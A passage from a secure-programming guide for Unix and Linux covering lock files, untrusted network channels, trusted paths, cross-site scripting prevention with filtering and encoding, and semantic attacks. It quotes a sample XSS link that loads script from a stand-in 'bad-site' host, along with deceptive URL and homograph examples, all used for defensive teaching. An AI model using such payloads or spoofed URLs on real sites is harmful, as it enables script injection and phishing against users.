should use open() with the flags O_WRONLY | O_CREAT | O_EXCL (and again, no
permissions, so that other processes with the same owner won't get the lock).
Note the use of O_EXCL, which is the official way to create ``exclusive''
files; this even works for root on a local filesystem. [Rochkind 1985, 27].
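A minimal sketch of this lock-file approach (the helper names and lock path are illustrative):

```c
#include <fcntl.h>
#include <unistd.h>

/* Try to take the lock by creating the lock file exclusively.
 * Returns the open descriptor on success, or -1 if the file already
 * exists (someone else holds the lock) or on error.  File mode 0 so
 * that other processes with the same owner can't reuse the file. */
int acquire_lock(const char *lockpath)
{
    return open(lockpath, O_WRONLY | O_CREAT | O_EXCL, 0);
}

void release_lock(const char *lockpath, int fd)
{
    close(fd);
    unlink(lockpath);
}
```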
Second, if the lock file may be on an NFS-mounted filesystem, then you have
the problem that NFS version 2 doesn't completely support normal file
semantics. This can even be a problem for work that's supposed to be
``local'' to a client, since some clients don't have local disks and may have
all files remotely mounted via NFS. The manual for open(2) explains how to
handle things in this case (which also handles the case of root programs):
"... programs which rely on [the O_CREAT and O_EXCL flags of open(2) to work
on filesystems accessed via NFS version 2] for performing locking tasks will
contain a race condition. The solution for performing atomic file locking
using a lockfile is to create a unique file on the same filesystem (e.g.,
incorporating hostname and pid), use link(2) to make a link to the lockfile
and use stat(2) on the unique file to check if its link count has increased
to 2. Do not use the return value of the link(2) call."
Obviously, this solution only works if all programs doing the locking are
cooperating, and if all non-cooperating programs aren't allowed to interfere.
In particular, the directories you're using for file locking must not have
permissive file permissions for creating and removing files.
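The recipe from the open(2) manual can be sketched as follows; note that only stat(2)'s link count decides success, never link(2)'s return value (the function name is illustrative):

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* NFSv2-safe lock: create a unique file on the same filesystem
 * (incorporating hostname and pid), link(2) it to the shared lock
 * name, then check with stat(2) whether the unique file's link count
 * reached 2.  Returns 0 if the lock was acquired, -1 otherwise. */
int nfs_safe_lock(const char *lockfile)
{
    char uniq[256], host[64];
    struct stat st;
    int fd, ok = -1;

    if (gethostname(host, sizeof(host)) != 0)
        return -1;
    host[sizeof(host) - 1] = '\0';
    snprintf(uniq, sizeof(uniq), "%s.%s.%ld", lockfile, host, (long)getpid());

    fd = open(uniq, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd == -1)
        return -1;
    close(fd);

    (void)link(uniq, lockfile);      /* ignore the return value... */
    if (stat(uniq, &st) == 0 && st.st_nlink == 2)
        ok = 0;                      /* ...trust only the link count */
    unlink(uniq);                    /* the lockfile name holds the lock */
    return ok;
}
```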
NFS version 3 added support for O_EXCL mode in open(2); see IETF RFC 1813, in
particular the "EXCLUSIVE" value to the "mode" argument of "CREATE". Sadly,
not everyone has switched to NFS version 3 or higher at the time of this
writing, so you can't depend on this yet in portable programs. Still, in the
long run there's hope that this issue will go away.
If you're locking a device or the existence of a process on a local machine,
try to use standard conventions. I recommend using the Filesystem Hierarchy
Standard (FHS); it is widely referenced by Linux systems, but it also tries
to incorporate the ideas of other Unix-like systems. The FHS describes
standard conventions for such locking files, including naming, placement, and
standard contents of these files [FHS 1997]. If you just want to be sure that
your server doesn't execute more than once on a given machine, you should
usually create a process identifier as /var/run/NAME.pid with the pid as its
contents. In a similar vein, you should place lock files for things like
device lock files in /var/lock. This approach has the minor disadvantage of
leaving files hanging around if the program suddenly halts, but it's standard
practice and that problem is easily handled by other system tools.
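Writing such a pid file is simple; a sketch (in real use the path would be /var/run/NAME.pid, which normally requires root to write):

```c
#include <stdio.h>
#include <unistd.h>

/* Record this server's pid at the given path, per the FHS convention
 * of /var/run/NAME.pid.  Returns 0 on success, -1 on failure. */
int write_pid_file(const char *path)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fprintf(f, "%ld\n", (long)getpid());
    return (fclose(f) == 0) ? 0 : -1;
}
```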
It's important that the programs which are cooperating using files to
represent the locks use the same directory, not just the same directory name.
This is an issue with networked systems: the FHS explicitly notes that /var/
run and /var/lock are unshareable, while /var/mail is shareable. Thus, if you
want the lock to work on a single machine, but not interfere with other
machines, use unshareable directories like /var/run (e.g., you want to permit
each machine to run its own server). However, if you want all machines
sharing files in a network to obey the lock, you need to use a directory that
they're sharing; /var/mail is one such location. See FHS section 2 for more
information on this subject.
-----------------------------------------------------------------------------
7.10.2.2. Other Approaches to Locking
Of course, you need not use files to represent locks. Network servers often
need not bother; the mere act of binding to a port acts as a kind of lock,
since if there's an existing server bound to a given port, no other server
will be able to bind to that port.
Another approach to locking is to use POSIX record locks, implemented through
fcntl(2) as a ``discretionary lock''. These are discretionary, that is, using
them requires the cooperation of the programs needing the locks (just as the
approach to using files to represent locks does). There's a lot to recommend
POSIX record locks: POSIX record locking is supported on nearly all Unix-like
platforms (it's mandated by POSIX.1), it can lock portions of a file (not
just a whole file), and it can handle the difference between read locks and
write locks. Even more usefully, if a process dies, its locks are
automatically removed, which is usually what is desired.
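A minimal sketch of taking a whole-file POSIX record lock with fcntl(2) (the helper name is illustrative):

```c
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Take a discretionary (advisory) write lock on the whole file using
 * a POSIX record lock.  The lock is released automatically if the
 * process dies.  Returns 0 on success, -1 if another process already
 * holds a conflicting lock (F_SETLK does not block). */
int lock_whole_file(int fd)
{
    struct flock fl;
    memset(&fl, 0, sizeof(fl));
    fl.l_type = F_WRLCK;     /* exclusive write lock */
    fl.l_whence = SEEK_SET;
    fl.l_start = 0;
    fl.l_len = 0;            /* length 0 means "to end of file" */
    return fcntl(fd, F_SETLK, &fl);
}
```

Use F_SETLKW instead of F_SETLK if you want to wait for the lock rather than fail immediately.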
You can also use mandatory locks, which are based on System V's mandatory
locking scheme. These only apply to files where the locked file's setgid bit
is set, but the group execute bit is not set. Also, you must mount the
filesystem to permit mandatory file locks. In this case, every read(2) and
write(2) is checked for locking; while this is more thorough than advisory
locks, it's also slower. Also, mandatory locks don't port as widely to other
Unix-like systems (they're available on Linux and System V-based systems, but
not necessarily on others). Note that processes with root privileges can be
held up by a mandatory lock, too, making it possible that this could be the
basis of a denial-of-service attack.
-----------------------------------------------------------------------------
7.11. Trust Only Trustworthy Channels
In general, only trust information (input or results) from trustworthy
channels. For example, the routines getlogin(3) and ttyname(3) return
information that can be controlled by a local user, so don't trust them for
security purposes.
In most computer networks (and certainly for the Internet at large), no
unauthenticated transmission is trustworthy. For example, packets sent over
the public Internet can be viewed and modified at any point along their path,
and arbitrary new packets can be forged. These forged packets might include
forged information about the sender (such as their machine (IP) address and
port) or receiver. Therefore, don't use these values as your primary criteria
for security decisions unless you can authenticate them (say using
cryptography).
This means that, except under special circumstances, two old techniques for
authenticating users in TCP/IP should often not be used as the sole
authentication mechanism. One technique is to limit users to ``certain
machines'' by checking the ``from'' machine address in a data packet; the
other is to limit access by requiring that the sender use a ``trusted'' port
number (a number less than 1024). The problem is that in many environments an
attacker can forge these values.
In some environments, checking these values (e.g., the sending machine IP
address and/or port) can have some value, so it's not a bad idea to support
such checking as an option in a program. For example, if a system runs behind
a firewall, the firewall can't be breached or circumvented, and the firewall
stops external packets that claim to be from the inside, then you can claim
that any packet saying it's from the inside really is. Note that you can't
be sure the packet actually comes from the machine it claims it comes from -
so you're only countering external threats, not internal threats. However,
broken firewalls, alternative paths, and mobile code make even these
assumptions suspect.
The problem is supporting untrustworthy information as the only way to
authenticate someone. If you need a trustworthy channel over an untrusted
network, in general you need some sort of cryptologic service (at the very
least, a cryptologically safe hash). See Section 11.5 for more information on
cryptographic algorithms and protocols. If you're implementing a standard and
inherently insecure protocol (e.g., ftp and rlogin), provide safe defaults
and document the assumptions clearly.
The Domain Name Server (DNS) is widely used on the Internet to maintain
mappings between the names of computers and their IP (numeric) addresses. The
technique called ``reverse DNS'' eliminates some simple spoofing attacks, and
is useful for determining a host's name. However, this technique is not
trustworthy for authentication decisions. The problem is that, in the end, a
DNS request will be sent eventually to some remote system that may be
controlled by an attacker. Therefore, treat DNS results as an input that
needs validation and don't trust it for serious access control.
Arbitrary email (including the ``from'' value of addresses) can be forged as
well. Using digital signatures is a method to thwart many such attacks. A
more easily thwarted approach is to require emailing back and forth with
special randomly-created values, but for low-value transactions such as
signing onto a public mailing list this is usually acceptable.
Note that in any client/server model, including CGI, the server must
assume that the client (or someone interposing between the client and server)
can modify any value. For example, so-called ``hidden fields'' and cookie
values can be changed by the client before being received by CGI programs.
These cannot be trusted unless special precautions are taken. For example,
the hidden fields could be signed in a way the client cannot forge as long as
the server checks the signature. The hidden fields could also be encrypted
using a key only the trusted server could decrypt (this latter approach is
the basic idea behind the Kerberos authentication system). InfoSec labs has
further discussion about hidden fields and applying encryption at [http://
www.infoseclabs.com/mschff/mschff.htm] http://www.infoseclabs.com/mschff/
mschff.htm. In general, you're better off keeping data you care about at the
server end in a client/server model. In the same vein, don't depend on
HTTP_REFERER for authentication in a CGI program, because this is sent by the
user's browser (not the web server).
This issue applies to data referencing other data, too. For example, HTML or
XML allow you to include by reference other files (e.g., DTDs and style
sheets) that may be stored remotely. However, those external references could
be modified so that users see a very different document than intended; a
style sheet could be modified to ``white out'' words at critical locations,
deface its appearance, or insert new text. External DTDs could be modified to
prevent use of the document (by adding declarations that break validation) or
insert different text into documents [St. Laurent 2000].
-----------------------------------------------------------------------------
7.12. Set up a Trusted Path
The counterpart to needing trustworthy channels (see Section 7.11) is
assuring users that they really are working with the program or system they
intended to use.
The traditional example is a ``fake login'' program. If a program is written
to look like the login screen of a system, then it can be left running. When
users try to log in, the fake login program can then capture user passwords
for later use.
A solution to this problem is a ``trusted path.'' A trusted path is simply
some mechanism that provides confidence that the user is communicating with
what the user intended to communicate with, ensuring that attackers can't
intercept or modify whatever information is being communicated.
If you're asking for a password, try to set up a trusted path. Unfortunately,
stock Linux distributions and many other Unixes don't have a trusted path
even for their normal login sequence. One approach is to require pressing an
unforgeable key before login, e.g., Windows NT/2000 uses
``control-alt-delete'' before logging in; since normal programs in Windows
can't intercept this key pattern, this approach creates a trusted path.
There's a Linux equivalent, termed the Secure Attention Key (SAK); it's
recommended that this be mapped to ``control-alt-pause''. Unfortunately, at
the time of this writing SAK is immature and not well-supported by Linux
distributions. Another approach for implementing a trusted path locally is to
control a separate display that only the login program can perform. For
example, if only trusted programs could modify the keyboard lights (the LEDs
showing Num Lock, Caps Lock, and Scroll Lock), then a login program could
display a running pattern to indicate that it's the real login program.
Unfortunately, since in current Linux normal users can change the LEDs, the
LEDs can't currently be used to confirm a trusted path.
Sadly, the problem is much worse for network applications. Although setting
up a trusted path is desirable for network applications, completely doing so
is quite difficult. When sending a password over a network, at the very least
encrypt the password between trusted endpoints. This will at least prevent
eavesdropping of passwords by those not connected to the system, and at least
make attacks harder to perform. If you're concerned about trusted path for
the actual communication, make sure that the communication is encrypted and
authenticated (or at least authenticated).
It turns out that this isn't enough to have a trusted path to networked
applications, in particular for web-based applications. There are documented
methods for fooling users of web browsers into thinking that they're at one
place when they are really at another. For example, Felten [1997] discusses
``web spoofing'', where users believe they're viewing one web page when in
fact all the web pages they view go through an attacker's site (who can then
monitor all traffic and modify any data sent in either direction). This is
accomplished by rewriting URLs. The rewritten URLs can be made nearly
invisible by using other technology (such as Javascript) to hide any possible
evidence in the status line, location line, and so on. See their paper for
more details. Another technique for hiding such URLs is exploiting
rarely-used URL syntax, for example, the URL ``http://www.ibm.com/
stuff@mysite.com'' is actually a request to view ``mysite.com'' (a
potentially malevolent site) using the unusual username ``www.ibm.com/stuff''.
If the URL is long enough, the real material won't be displayed and users are
unlikely to notice the exploit anyway. Yet another approach is to create
sites with names deliberately similar to the ``real'' site - users may not
know the difference. In all of these cases, simply encrypting the line
doesn't help - the attacker can be quite content in encrypting data while
completely controlling what's shown.
Countering these problems is more difficult; at this time I have no good
technical solution for fully preventing ``fooled'' web users. I would
encourage web browser developers to counter such ``fooling'', making it
easier to spot. If it's critical that your users correctly connect to the
correct site, have them use simple procedures to counter the threat. Examples
include having them halt and restart their browser, and making sure that the
web address is very simple and not normally misspelled (so misspelling it is
unlikely). You might also want to gain ownership of some ``similar'' sounding
DNS names, and search for other such DNS names and material to find
attackers.
-----------------------------------------------------------------------------
7.13. Use Internal Consistency-Checking Code
The program should check to ensure that its call arguments and basic state
assumptions are valid. In C, macros such as assert(3) may be helpful in doing
so.
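An illustrative sketch (note that compiling with -DNDEBUG removes assert checks, so don't rely on them for security-critical validation of untrusted input):

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Illustrative: check call arguments and basic state assumptions with
 * assert(3) before doing any work.  Copies src into dst, truncating
 * to fit, and returns the number of characters copied. */
size_t bounded_copy(char *dst, const char *src, size_t dstlen)
{
    assert(dst != NULL && src != NULL);  /* arguments must be real buffers */
    assert(dstlen > 0);                  /* must have room for the NUL */
    size_t n = strlen(src);
    if (n >= dstlen)
        n = dstlen - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}
```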
-----------------------------------------------------------------------------
7.14. Self-limit Resources
In network daemons, shed or limit excessive loads. Set limit values (using
setrlimit(2)) to limit the resources that will be used. At the least, use
setrlimit(2) to disable creation of ``core'' files. For example, by default
Linux will create a core file that saves all program memory if the program
fails abnormally, but such a file might include passwords or other sensitive
data.
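Disabling core files with setrlimit(2) takes just a few lines; a sketch:

```c
#include <sys/resource.h>

/* Set the core-file size limit to zero so that a crash can't leave
 * passwords or other sensitive memory contents in a core file. */
int disable_core_files(void)
{
    struct rlimit rl;
    rl.rlim_cur = 0;   /* soft limit */
    rl.rlim_max = 0;   /* hard limit: prevent raising it back */
    return setrlimit(RLIMIT_CORE, &rl);
}
```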
-----------------------------------------------------------------------------
7.15. Prevent Cross-Site (XSS) Malicious Content
Some secure programs accept data from one untrusted user (the attacker) and
pass that data on to a different user's application (the victim). If the
secure program doesn't protect the victim, the victim's application (e.g.,
their web browser) may then process that data in a way harmful to the victim.
This is a particularly common problem for web applications using HTML or XML,
where the problem goes by several names including ``cross-site scripting'',
``malicious HTML tags'', and ``malicious content.'' This book will call this
problem ``cross-site malicious content,'' since the problem isn't limited to
scripts or HTML, and its cross-site nature is fundamental. Note that this
problem isn't limited to web applications, but since this is a particular
problem for them, the rest of this discussion will emphasize web
applications. As will be shown in a moment, sometimes an attacker can cause a
victim to send data from the victim to the secure program, so the secure
program must protect the victim from himself.
-----------------------------------------------------------------------------
7.15.1. Explanation of the Problem
Let's begin with a simple example. Some web applications are designed to
permit HTML tags in data input from users that will later be posted to other
readers (e.g., in a guestbook or ``reader comment'' area). If nothing is done
to prevent it, these tags can be used by malicious users to attack other
users by inserting scripts, Java references (including references to hostile
applets), DHTML tags, early document endings (via </HTML>), absurd font size
requests, and so on. This capability can be exploited for a wide range of
effects, such as exposing SSL-encrypted connections, accessing restricted web
sites via the client, violating domain-based security policies, making the
web page unreadable, making the web page unpleasant to use (e.g., via
annoying banners and offensive material), permitting privacy intrusions (e.g., by
inserting a web bug to learn exactly who reads a certain page), creating
denial-of-service attacks (e.g., by creating an ``infinite'' number of
windows), and even very destructive attacks (by inserting attacks on security
vulnerabilities such as scripting languages or buffer overflows in browsers).
By embedding malicious FORM tags at the right place, an intruder may even be
able to trick users into revealing sensitive information (by modifying the
behavior of an existing form). Or, by embedding scripts, an intruder can
cause no end of problems. This is by no means an exhaustive list of problems,
but hopefully this is enough to convince you that this is a serious problem.
Most ``discussion boards'' have already discovered this problem, and most
already take steps to prevent it in text intended to be part of a multiperson
discussion. Unfortunately, many web application developers don't realize that
this is a much more general problem. Every data value that is sent from one
user to another can potentially be a source for cross-site malicious posting,
even if it's not an ``obvious'' case of an area where arbitrary HTML is
expected. The malicious data can even be supplied by the user himself, since
the user may have been fooled into supplying the data via another site.
Here's an example (from CERT) of an HTML link that causes the user to send
malicious data to another site:
<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT
SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A>
In short, a web application cannot accept input (including any form data)
without checking, filtering, or encoding it. You can't even pass that data
back to the same user in many cases in web applications, since another user
may have surreptitiously supplied the data. Even if permitting such material
won't hurt your system, it will enable your system to be a conduit of attacks
to your users. Even worse, those attacks will appear to be coming from your
system.
CERT describes the problem this way in their advisory:
A web site may inadvertently include malicious HTML tags or script in a
dynamically generated page based on unvalidated input from untrustworthy
sources (CERT Advisory CA-2000-02, Malicious HTML Tags Embedded in Client
Web Requests).
More information from CERT about this is available at [http://www.cert.org/
archive/pdf/cross_site_scripting.pdf] http://www.cert.org/archive/pdf/
cross_site_scripting.pdf.
-----------------------------------------------------------------------------
7.15.2. Solutions to Cross-Site Malicious Content
Fundamentally, this means that all web application output impacted by any
user must be filtered (so characters that can cause this problem are
removed), encoded (so the characters that can cause this problem are encoded
in a way to prevent the problem), or validated (to ensure that only ``safe''
data gets through). This includes all output derived from input such as URL
parameters, form data, cookies, database queries, CORBA ORB results, and data
from users stored in files. In many cases, filtering and validation should be
done at the input, but encoding can be done during either input validation or
output generation. If you're just passing the data through without analysis,
it's probably better to encode the data on input (so it won't be forgotten).
However, if your program processes the data, it can be easier to encode it on
output instead. CERT recommends that filtering and encoding be done during
data output; this isn't a bad idea, but there are many cases where it makes
sense to do it at input instead. The critical issue is to make sure that you
cover all cases for every output, which is not an easy thing to do regardless
of approach.
Warning - in many cases these techniques can be subverted unless you've also
gained control over the character encoding of the output. Otherwise, an
attacker could use an ``unexpected'' character encoding to subvert the
techniques discussed here. Thankfully, this isn't hard; gaining control over
output character encoding is discussed in Section 9.5.
One minor defense, that's often worth doing, is the "HttpOnly" flag for
cookies. Scripts that run in a web browser cannot access cookie values that
have the HttpOnly flag set (they just get an empty value instead). This is
currently implemented in Microsoft Internet Explorer, and I expect Mozilla/
Netscape to implement this soon too. You should set HttpOnly on for any
cookie you send, unless you have scripts that need the cookie, to counter
certain kinds of cross-site scripting (XSS) attacks. However, the HttpOnly
flag can be circumvented in a variety of ways, so using it as your primary
defense is inappropriate. Instead, it's a helpful secondary defense that may
help save you in case your application is written incorrectly.
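The HttpOnly flag is just an attribute appended to the Set-Cookie header. Here
is a minimal illustration (ours, not from the HOWTO) using Python's standard
http.cookies module; the cookie name and value are arbitrary:

```python
# Sketch: emit a Set-Cookie header carrying the HttpOnly flag, so that
# scripts running in the browser cannot read the cookie's value.
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "abc123"          # hypothetical session identifier
cookie["session"]["httponly"] = True  # blocks script access to the cookie

header = cookie.output()  # e.g. "Set-Cookie: session=abc123; HttpOnly"
print(header)
```

The same flag can be set in any language or framework; the point is simply
that it is part of the Set-Cookie header the server sends.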
The first subsection below discusses how to identify special characters that
need to be filtered, encoded, or validated. This is followed by subsections
describing how to filter or encode these characters. There's no subsection
discussing how to validate data in general, however, for input validation in
general see Chapter 5, and if the input is straight HTML text or a URI, see
Section 5.11. Also note that your web application can receive malicious
cross-postings, so non-queries should forbid the GET protocol (see Section
5.12).
-----------------------------------------------------------------------------
7.15.2.1. Identifying Special Characters
Here are the special characters for a variety of circumstances (my thanks to
the CERT, who developed this list):
  * In the content of a block-level element (e.g., in the middle of a
    paragraph of text in HTML or a block in XML):
      + "<" is special because it introduces a tag.
      + "&" is special because it introduces a character entity.
      + ">" is special because some browsers treat it as special, on the
        assumption that the author of the page really meant to put in an
        opening "<", but omitted it in error.
  * In attribute values:
      + In attribute values enclosed with double quotes, the double quotes
        are special because they mark the end of the attribute value.
      + In attribute values enclosed with single quotes, the single quotes
        are special because they mark the end of the attribute value. XML's
        definition allows single quotes, but I've been told that some XML
        parsers don't handle them correctly, so you might avoid using single
        quotes in XML.
      + Attribute values without any quotes make white-space characters
        such as space and tab special. Note that unquoted values aren't
        legal in XML either, and they make more characters special. Thus, I
        recommend against unquoted attributes if you're using dynamically
        generated values in them.
      + "&" is special when used in conjunction with some attributes because
        it introduces a character entity.
  * In URLs: for example, a search engine might provide a link within the
    results page that the user can click to re-run the search. This can be
    implemented by encoding the search query inside the URL. When this is
    done, it introduces additional special characters:
      + Space, tab, and newline are special because they mark the end of the
        URL.
      + "&" is special because it introduces a character entity or separates
        CGI parameters.
      + Non-ASCII characters (that is, everything above 128 in the ISO-8859-1
        encoding) aren't allowed in URLs, so they are all special here.
      + The "%" must be filtered from input anywhere parameters encoded with
        HTTP escape sequences are decoded by server-side code. The percent
        must be filtered if input such as "%68%65%6C%6C%6F" becomes "hello"
        when it appears on the web page in question.
  * Within the body of a <SCRIPT> </SCRIPT> block, the semicolon,
    parentheses, curly braces, and newline should be filtered in situations
    where text could be inserted directly into a preexisting script tag.
  * Server-side scripts that convert any exclamation characters (!) in input
    to double-quote characters (") on output might require additional
    filtering.
Note that, in general, the ampersand (&) is special in HTML and XML.
-----------------------------------------------------------------------------
7.15.2.2. Filtering
One approach to handling these special characters is simply eliminating them
(usually during input or output).
If you're already validating your input for valid characters (and you
generally should), this is easily done by simply omitting the special
characters from the list of valid characters. Here's an example in Perl of a
filter that only accepts legal characters, and since the filter doesn't
accept any special characters other than the space, it's quite acceptable for
use in areas such as a quoted attribute:
# Accept only legal characters:
$summary =~ tr/A-Za-z0-9\ \.\://dc;
However, if you really want to strip away only the smallest number of
characters, then you could create a subroutine to remove just those
characters:
sub remove_special_chars {
    my ($s) = @_;
    $s =~ s/[\<\>\"\'\%\;\(\)\&\+]//g;
    return $s;
}

# Sample use:
$data = &remove_special_chars($data);
-----------------------------------------------------------------------------
7.15.2.3. Encoding (Quoting)
An alternative to removing the special characters is to encode them so that
they don't have any special meaning. This has several advantages over
filtering the characters, in particular, it prevents data loss. If the data
is "mangled" by the process from the user's point of view, at least when the
data is encoded it's possible to reconstruct the data that was originally
sent.
HTML, XML, and SGML all use the ampersand ("&") character as a way to
introduce encodings in the running text; this encoding is often called ``HTML
encoding.'' To encode these characters, simply transform the special
characters in your circumstance. Usually this means '<' becomes '&lt;', '>'
becomes '&gt;', '&' becomes '&amp;', and '"' becomes '&quot;'. As noted
above, although in theory '>' doesn't need to be quoted, because some
browsers act on it (and fill in a '<') it needs to be quoted. There's a minor
complexity with the double-quote character, because '&quot;' only needs to be
used inside attributes, and some extremely old browsers don't properly render
it. If you can handle the additional complexity, you can try to encode '"'
only when you need to, but it's easier to simply encode it and ask users to
upgrade their browsers. Few users will use such ancient browsers, and the
double-quote character encoding has been a standard for a long time.
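The transformation just described is easy to get subtly wrong in one respect:
the ampersand must be encoded first, or characters you have already encoded
will be encoded a second time. A minimal sketch (ours; the function name is
not from the HOWTO):

```python
# Minimal HTML encoding as described above. '&' must be replaced
# first, otherwise the '&' in '&lt;' etc. would be double-encoded.
def html_encode(s):
    s = s.replace("&", "&amp;")   # must come first
    s = s.replace("<", "&lt;")
    s = s.replace(">", "&gt;")
    s = s.replace('"', "&quot;")
    return s

print(html_encode('<script>alert("x")</script>'))
# -> &lt;script&gt;alert(&quot;x&quot;)&lt;/script&gt;
```

Most languages also ship a library routine for this (e.g., Python's
html.escape); if you trust its coverage of your special characters, prefer it
over hand-rolled code.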
Scripting languages may consider implementing specialized auto-quoting types,
an interesting approach developed in the web application framework [http://
www.mems-exchange.org/software/quixote] Quixote. Quixote includes a
"template" feature which allows easy mixing of HTML text and Python code;
text generated by a template is passed back to the web browser as an HTML
document. As of version 0.6, Quixote has two kinds of text (instead of a
single kind as most such languages). Anything which appears in a literal,
quoted string is of type "htmltext," and it is assumed to be exactly as the
programmer wanted it to be (this is reasonable, since the programmer wrote it).
Anything which takes the form of an ordinary Python string, however, is
automatically quoted as the template is executed. As a result, text from a
database or other external source is automatically quoted, and cannot be used
for a cross-site scripting attack. Thus, Quixote implements a safe default -
programmers no longer need to worry about quoting every bit of text that
passes through the application (bugs involving too much quoting are less
likely to be a security problem, and will be obvious in testing). Quixote
uses an open source software license, but because of its choice-of-venue
clause it is probably GPL-incompatible. It is used by organizations such as the
[http://lwn.net] Linux Weekly News.
This approach to HTML encoding isn't quite enough encoding in some
circumstances. As discussed in Section 9.5, you need to specify the output
character encoding (the ``charset''). If some of your data is encoded using a
different character encoding than the output character encoding, then you'll
need to do something so your output uses a consistent and correct encoding.
Also, if you've selected an output encoding other than ISO-8859-1, then you need
to make sure that any alternative encodings for special characters (such as "
<") can't slip through to the browser. This is a problem with several
character encodings, including popular ones like UTF-7 and UTF-8; see Section
5.9 for more information on how to prevent ``alternative'' encodings of
characters. One way to deal with incompatible character encodings is to first
translate the characters internally to ISO 10646 (which has the same
character values as Unicode), and then using either numeric character
references or character entity references to represent them:
  * A numeric character reference looks like "&#D;", where D is a decimal
    number, or "&#xH;" or "&#XH;", where H is a hexadecimal number. The
    number given is the ISO 10646 character id (which has the same character
    values as Unicode). Thus &#1048; is the Cyrillic capital letter "I". The
    hexadecimal system isn't supported in the SGML standard (ISO 8879), so
    I'd suggest using the decimal system for output. Also, although the SGML
    specification permits the trailing semicolon to be omitted in some
    circumstances, in practice many systems don't handle it - so always
    include the trailing semicolon.
  * A character entity reference does the same thing but uses mnemonic names
    instead of numbers. For example, "&lt;" represents the < sign. If you're
    generating HTML, see the [http://www.w3.org] HTML specification, which
    lists all mnemonic names.
Either system (numeric or character entity) works; I suggest using character
entity references for '<', '>', '&', and '"' because it makes your code (and
output) easier for humans to understand. Other than that, it's not clear that
one or the other system is uniformly better. If you expect humans to edit the
output by hand later, use the character entity references where you can,
otherwise I'd use the decimal numeric character references just because
they're easier to program. This encoding scheme can be quite inefficient for
some languages (especially Asian languages); if that is your primary content,
you might choose to use a different character encoding (charset), filter on
the critical characters (e.g., "<") and ensure that no alternative encodings
for critical characters are allowed.
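The translate-then-reference scheme above can be sketched as follows (ours,
not from the HOWTO); in Python, ord() already yields the ISO 10646 / Unicode
code point, so the "translation" step is implicit:

```python
# Sketch: encode the four HTML-special ASCII characters as character
# entity references, pass other printable ASCII through, and emit
# decimal numeric character references for everything else.
def to_entities(s):
    out = []
    for ch in s:
        if ch == "&":   out.append("&amp;")
        elif ch == "<": out.append("&lt;")
        elif ch == ">": out.append("&gt;")
        elif ch == '"': out.append("&quot;")
        elif ord(ch) < 128:
            out.append(ch)
        else:
            # ord() gives the ISO 10646 code point; always include the
            # trailing semicolon, as recommended above.
            out.append("&#%d;" % ord(ch))
    return "".join(out)

print(to_entities("caf\u00e9 <menu>"))
# -> caf&#233; &lt;menu&gt;
```

Because the output is pure ASCII, no alternative encoding of "<" or "&" can
slip through to the browser, whatever charset the page declares.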
URIs have their own encoding scheme, commonly called ``URL encoding.'' In
this system, a character not permitted in URLs is represented as a percent
sign followed by its two-digit hexadecimal value. To handle all of ISO 10646
(Unicode), it's recommended to first translate the codes to UTF-8, and then
encode it. See Section 5.11.4 for more about validating URIs.
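Most languages provide this directly. For instance, Python's standard
urllib.parse.quote first encodes the string as UTF-8 and then
percent-encodes the resulting bytes, matching the scheme just described (the
sample string is ours):

```python
# URL-encoding: UTF-8 first, then percent-escape each unsafe byte.
from urllib.parse import quote

print(quote("héllo world"))
# -> h%C3%A9llo%20world   ('é' is the two UTF-8 bytes C3 A9)
```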
-----------------------------------------------------------------------------
7.16. Foil Semantic Attacks
A ``semantic attack'' is an attack in which the attacker uses the computing
infrastructure/system in a way that fools the victim into thinking they are
doing something, but are doing something different, yet the computing
infrastructure/system is working exactly as it was designed to do. Semantic
attacks often involve financial scams, where the attacker is trying to fool
the victim into giving the attacker large sums of money (e.g., thinking
they're investing in something). For example, the attacker may try to
convince the user that they're looking at a trusted website, even if they
aren't.
Semantic attacks are difficult to counter, because they're exploiting the
correct operation of the computer. The way to deal with semantic attacks is
to help give the human additional information, so that when ``odd'' things
happen the human will have more information or a warning will be presented
that something may not be what it appears to be.
One example is URIs that, while legitimate, may fool users into thinking they
have a different meaning. For example, look at this URI:
http://www.bloomberg.com@www.badguy.com
If a user clicked on that URI, they might think that they're going to
Bloomberg (who provide financial commodities news), but instead they're going
to www.badguy.com (and providing the username www.bloomberg.com, which
www.badguy.com will conveniently ignore). If the badguy.com website then
imitated the bloomberg.com site, a user might be convinced that they're
seeing the real thing (and make investment decisions based on
attacker-controlled information). This depends on URIs being used in an
unusual way - clickable URIs can have usernames, but usually don't. One
solution for this case is for the web browser to detect such unusual URIs and
create a pop-up confirmation widget, saying ``You are about to log into
www.badguy.com as user www.bloomberg.com; do you wish to proceed?'' If the
widget allows the user to change these entries, it provides additional
functionality to the user as well as providing protection against that
attack.
Another example is homographs, particularly international homographs. Certain
letters look similar to each other, and these can be exploited as well. For
example, since 0 (zero) and O (the letter O) look similar to each other,
users may not realize that WWW.BLOOMBERG.COM and WWW.BL00MBERG.COM are
different web addresses. Other similar-looking letters include 1 (one) and l
(lower-case L). If international characters are allowed, the situation is
worse. For example, many Cyrillic letters look essentially the same as Roman
letters, but the computer will treat them differently. Currently most systems
don't allow international characters in host names, but for various good
reasons it's widely agreed that support for them will be necessary in the
future. One proposed solution has been to display letters from different code
regions using different colors - that way, users get more information
visually. If users look at the URI, they will hopefully notice the strange
coloring [Gabrilovich 2002]. However, this does show the essence of a
semantic attack - it's difficult to defend against, precisely because the
computers are working correctly.
-----------------------------------------------------------------------------
7.17. Be Careful with Data Types
Be careful with the data types used, in particular those used in interfaces.
For example, ``signed'' and ``unsigned'' values are treated differently in
many languages (such as C or C++).
-----------------------------------------------------------------------------
Chapter 8. Carefully Call Out to Other Resources
    Do not put your trust in princes, in mortal men, who cannot save.
        -- Psalms 146:3 (NIV)
Practically no program is truly self-contained; nearly all programs call out
to other programs for resources, such as programs provided by the operating
system, software libraries, and so on. Sometimes this calling out to other
resources isn't obvious or involves a great deal of ``hidden'' infrastructure
which must be depended on, e.g., the mechanisms to implement dynamic
libraries. Clearly, you must be careful about what other resources your
program trusts, and you must make sure that the way you send requests to them
is safe.
-----------------------------------------------------------------------------
8.1. Call Only Safe Library Routines
Sometimes there is a conflict between security and the development principles
